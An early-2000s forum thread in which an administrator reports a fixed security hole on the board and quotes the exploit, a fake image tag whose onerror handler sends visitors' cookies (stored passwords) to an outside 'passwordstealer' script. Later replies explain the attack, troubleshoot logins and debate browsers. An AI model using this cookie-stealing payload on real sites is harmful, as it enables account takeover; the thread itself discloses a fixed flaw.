| View previous topic :: View next topic |
| Author |
Message |
HyToFry
Drama queen
|
Posted: Mon Dec 17, 2001 11:02 pm Post subject: 1 |
|
|
With the help of justin, I've found, and eliminated a security hole that was on the GL.
Using a fake img tag that looked like this, quote:
[img]fake"onerror="this.src='http://www.hytofry.com/scripts/passwordstealer.cgi?passwords=(document.cookie)';"[/img]
the haxor could steal your password as soon as you opened the thread. (assuming you're using a browser that stores cookies).
The problem has been taken care of.
I don't think any passwords got leaked, but if you're an admin/mod... now might be the time to change your password. (I did, but I do monthly anyway) |
|
| Back to top |
|
 |
justindl
Daedalian Member
|
Posted: Mon Dec 17, 2001 11:05 pm Post subject: 2 |
|
|
i didn't steal anyone's but my own about 5000 times  |
|
| Back to top |
|
 |
NightOwl
Daedalian Member
|
Posted: Mon Dec 17, 2001 11:05 pm Post subject: 3 |
|
|
| Funny you should mention that cookie saving passwords thing... for the past three months my browser can't remember the GL's password. I thought you turned it off. |
|
| Back to top |
|
 |
justindl
Daedalian Member
|
Posted: Mon Dec 17, 2001 11:09 pm Post subject: 4 |
|
|
| go to preferences... it'll only do it for a year..... (this cookies thing works if you have cookies enabled at all) |
|
| Back to top |
|
 |
Moose
Liberty Chick
|
Posted: Mon Dec 17, 2001 11:14 pm Post subject: 5 |
|
|
YAY HY AND JUSTIN!!!
::hugs them both:: |
|
| Back to top |
|
 |
Sofis
Beautiful and Decadent
|
Posted: Tue Dec 18, 2001 3:31 am Post subject: 6 |
|
|
| Hy, I found an odd bug: when I change my password, I am no longer allowed into the GLOC forum, but I can still get into Private Games. Changing the password back to what it was restores my ability to get into GLOC. |
|
| Back to top |
|
 |
Quailman
His Postmajesty
|
Posted: Tue Dec 18, 2001 1:07 pm Post subject: 7 |
|
|
| HAHAHAHAHAHAHA!!!! I am the haxor! Unfortunately you closed the leak when I only had one password and it turned out to belong to some dickhead. |
|
| Back to top |
|
 |
Marvin
Pseudo-Yank
|
Posted: Tue Dec 18, 2001 2:12 pm Post subject: 8 |
|
|
I hope that was Quailman. |
|
| Back to top |
|
 |
HyToFry
Drama queen
|
Posted: Tue Dec 18, 2001 4:02 pm Post subject: 9 |
|
|
Witt like that? Had to be our Quailman.
Sofis... this isn't really a bug, but a cookie problem.
If you close your IE window, open a new one (from the desktop... File->New Window won't work) then it will ask you to log in again.
(I think.)
Or, you can go to preferences, and have the site delete all cookies, and then log in.
Hope this helps. |
|
| Back to top |
|
 |
Sofis
Beautiful and Decadent
|
Posted: Tue Dec 18, 2001 5:13 pm Post subject: 10 |
|
|
If it's a cookie problem, why would it affect only GLOC? I could get into Private Games just fine and the cookies were placing the new password into the password box. I'll try it though.
(Oh, and for the record, I use Opera, not IE.) |
|
| Back to top |
|
 |
Sofis
Beautiful and Decadent
|
Posted: Tue Dec 18, 2001 5:17 pm Post subject: 11 |
|
|
| Okay, it works. |
|
| Back to top |
|
 |
Lepton
1:41+ Arse Scratcher
|
Posted: Wed Dec 19, 2001 1:08 am Post subject: 12 |
|
|
| Opera has many problems. I'm surprised you've found a solution that doesn't involve blaming the bad program. |
|
| Back to top |
|
 |
HyToFry
Drama queen
|
Posted: Wed Dec 19, 2001 4:25 pm Post subject: 13 |
|
|
I think Opera is one of the best.
It's Nutscrape that sux. (I haven't tried 6.0, but I have heard from a reliable source that it's pretty good too.) |
|
| Back to top |
|
 |
Chuck
Daedalian Member
|
Posted: Wed Dec 19, 2001 5:09 pm Post subject: 14 |
|
|
| I tried Opera. It wouldn't run Java and kept locking up my computer. Maybe other have had better luck with it. |
|
| Back to top |
|
 |
justindl
Daedalian Member
|
Posted: Thu Dec 20, 2001 10:36 pm Post subject: 15 |
|
|
opera 6 has java. im going to get it as soon as it comes out for linux . opera rocks... it really REALLY does. ALOT |
|
| Back to top |
|
 |
HyToFry
Drama queen
|
Posted: Thu Dec 20, 2001 10:38 pm Post subject: 16 |
|
|
| I'll agree with that. |
|
| Back to top |
|
 |
Macros
Daedalian Member
|
Posted: Sat Dec 22, 2001 11:52 pm Post subject: 17 |
|
|
lol, seeing that topic title made me think i think for no reason at all, jeffk should get the title of "h4x0ring fux0r"
sorry =P |
|
| Back to top |
|
 |
extropalopakettle
No offense, but....
|
Posted: Sun Dec 23, 2001 2:27 am Post subject: 18 |
|
|
| Most (all? some?) browsers allow you to set an option (possibly the default setting) so that cookies on your machine can only be examined by the site that put them there (generally a good idea, if you're accepting cookies at all). Would setting that option have prevented the above exploit from working? Unless, of course, the cookie password stealer was operating from the GL. |
|
| Back to top |
|
 |
HyToFry
Drama queen
|
Posted: Wed Dec 26, 2001 7:13 pm Post subject: 19 |
|
|
It was activated from the GL, on the GL's web page. The image was actually setting it's src to be "something.com/thisscript.cgi?yourusernameandpasswordinfohere" The browser allowed it because it was comming from this page.
The only way you could have prevented it was to not allow java to access cookies, and I don't think that's possible, and even if it was, ubb wouldn't be able to save your password if you used it.  |
|
| Back to top |
|
 |
hucking fax0r
Guest
|
Posted: Fri Mar 15, 2002 2:13 am Post subject: 20 |
|
|
| HAHAHAHAHAhAHAHAHAHAHAHAHAHA!!!!!!11111 |
|
| Back to top |
|
 |
justindl
Daedalian Member
|
Posted: Sat Mar 16, 2002 8:06 pm Post subject: 21 |
|
|
woohoo i just had a new idea, off to check it  |
|
| Back to top |
|
 |
Chuck
Daedalian Member
|
Posted: Sat Mar 16, 2002 9:03 pm Post subject: 22 |
|
|
| Let's all just email our passwords to Justin so he can relax. |
|
| Back to top |
|
 |
|